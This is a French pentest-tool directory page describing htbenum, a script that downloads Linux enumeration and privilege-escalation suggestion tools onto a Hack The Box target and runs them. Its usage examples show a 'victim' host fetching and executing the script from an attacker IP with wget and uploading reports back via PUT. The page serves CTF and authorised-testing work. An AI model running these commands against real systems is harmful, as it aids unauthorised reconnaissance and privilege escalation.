Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
htbenum — Un script d'énumération Linux pour Hack The Box | Kitploit
Outils/GitHubGitHub/solomonsklash/htbenum
Escalade de PrivilègesFrameworks d'ExploitationScripting et AutomatisationCollecte d'InformationsTests d'Intrusion
GitHubsolomonsklash/htbenum

htbenum

Un script d'énumération Linux pour Hack The Box

Voir le dépôt
19236il y a 6 ansVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

htbenum

Un script d'énumération Linux pour Hack The Box

GitHub Github language GitHub issues Github contributors

Ce script est conçu pour être utilisé dans des situations où vous n'avez pas d'accès Internet sur un hôte Linux et souhaitez exécuter des scripts d'énumération et de suggestion d'exploitation, comme sur Hack The Box. Je me retrouve souvent à lancer un ensemble similaire de scripts lorsque j'obtiens un premier point d'appui sur une machine Linux, et ce script permet d'automatiser le téléchargement de la dernière version de chaque script d'énumération, de le rendre exécutable et de l'exécuter, tout en envoyant la sortie vers un fichier pour un examen ultérieur. Il dispose également d'un serveur web intégré pour héberger les outils et télécharger les rapports vers la machine hôte.

Les pull requests/suggestions sont les bienvenues !

Fonctionnalités

  • 5 scripts d'énumération différents, notamment :
    • linux-smart-enumeration
    • LinEnum
    • linuxprivchecker.py
    • uptux
    • SUID3NUM
  • 2 outils de suggestion d'exploitation différents, notamment :
    • linux-soft-exploit-suggester
    • LES : Outil d'audit d'escalade de privilèges Linux
  • Serveur web intégré pour héberger les outils et télécharger les rapports terminés
  • Fonctionnalité de téléchargement et de mise à jour automatique des outils
  • Option de répertoire personnalisé, lorsque vous savez que vous avez accès à un répertoire spécifique (par défaut /tmp)
  • Menu interactif vous permettant de choisir entre exécuter uniquement l'énumération, uniquement la suggestion d'exploitation, ou les deux
  • Vérifie la présence de Python 2 et 3 et vous indique quels scripts seront ignorés si Python est manquant

Utilisation

root@kitploit:~
./htbenum.sh [-u] -i IP -p port [-o directory] [-w] [-r]

Exemple :
         Machine hôte : root@kali:~/htbenum# ./htbenum.sh -u
         Machine hôte : root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w
         Machine victime : www-data@victim:/tmp$ wget http://10.10.14.1:80/htbenum.sh
         Machine victime : www-data@victim:/tmp$ chmod +x ./htbenum.sh
         Machine victime : www-data@victim:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

 Paramètres :
         -h - Afficher l'aide et l'utilisation.
         -i IP - Adresse IP du serveur web d'écoute utilisé pour le téléchargement et l'envoi.
         -p port - Port TCP du serveur web d'écoute utilisé pour le téléchargement et l'envoi.
         -o directory - Répertoire personnalisé de téléchargement et de création de rapports (par défaut /tmp).
         -w - Démarrer le serveur web intégré pour télécharger les fichiers et envoyer les rapports.
         -u - Mettre à jour vers les dernières versions de chaque outil, en écrasant les versions existantes.
         -r - Envoyer les rapports vers le serveur web de la machine hôte (doit supporter les requêtes PUT).

Pour utiliser htbenum, clonez le dépôt et exécutez le script avec le paramètre update sur votre machine locale. Cela téléchargera et mettra à jour tous les scripts nécessaires depuis Internet (Github) et les placera dans le même répertoire que htbenum.sh :

root@kitploit:~
root@kali:~# git clone https://github.com/SolomonSklash/htbenum
root@kali:~# cd htbenum
root@kali:~/htbenum#  ./htbenum.sh -u
_   _ ___________ _____ _   _ _   ____  ___
| | | |_   _| ___ \  ___| \ | | | | |  \/  |
| |_| | | | | |_/ / |__ |  \| | | | | .  . |
|  _  | | | | ___ \  __|| . ` | | | | |\/| |
| | | | | | | |_/ / |___| |\  | |_| | |  | |
\_| |_/ \_/ \____/\____/\_| \_/\___/\_|  |_/

Par Solomon Sklash - [email protected] 

[i] Mise à jour de tous les outils...
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh [31859/31859] -> "lse.sh" [1]
2019-11-25 17:54:55 URL:https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh [46476/46476] -> "linenum.sh" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py [25304/25304] -> "linuxprivchecker.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/initstring/uptux/master/uptux.py [29853/29853] -> "uptux.py" [1]
2019-11-25 17:54:56 URL:https://raw.githubusercontent.com/Anon-Exploiter/SUID3NUM/master/suid3num.py [12614/12614] -> "suid3num.py" [1]
2019-11-25 17:54:57 URL:https://raw.githubusercontent.com/belane/linux-soft-exploit-suggester/master/linux-soft-exploit-suggester.py [13886/13886] -> "les-soft.py" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/offensive-security/exploit-database/master/files_exploits.csv [5669905/5669905] -> "files_exploits.csv" [1]
2019-11-25 17:54:58 URL:https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh [82214/82214] -> "les.sh" [1]
[i] Mise à jour terminée !
root@kali:~/htbenum#  

Ensuite, démarrez le serveur web intégré pour héberger les outils et recevoir les rapports terminés. Le serveur nécessite Python 3. Vous pouvez utiliser votre propre serveur web pour héberger les outils, mais il devra supporter les requêtes PUT pour les téléchargements de rapports.

root@kitploit:~
root@kali:~/htbenum# ./htbenum.sh -i 10.10.14.1 -p 80 -w

Enfin, téléchargez le script htbenum.sh sur votre machine cible, rendez-le exécutable et exécutez-le avec l'adresse IP et le port de votre machine hôte, avec un répertoire facultatif pour télécharger les fichiers et écrire la sortie des rapports. Vous pouvez également envoyer les rapports vers la machine hôte si vous le souhaitez. Par exemple :

root@kitploit:~
www-data@htb:/tmp$ wget http://10.10.99.100/htbenum.sh -O /tmp/htbenum.sh
www-data@htb:/tmp$ chmod +x ./htbenum.sh
www-data@htb:/tmp$ ./htbenum.sh -i 10.10.14.1 -p 80 -r

Chaque outil enverra sa sortie vers un fichier de rapport dans le même répertoire que le script htbenum.sh, ou dans le répertoire spécifié par le paramètre -d.

Télécharger l’outil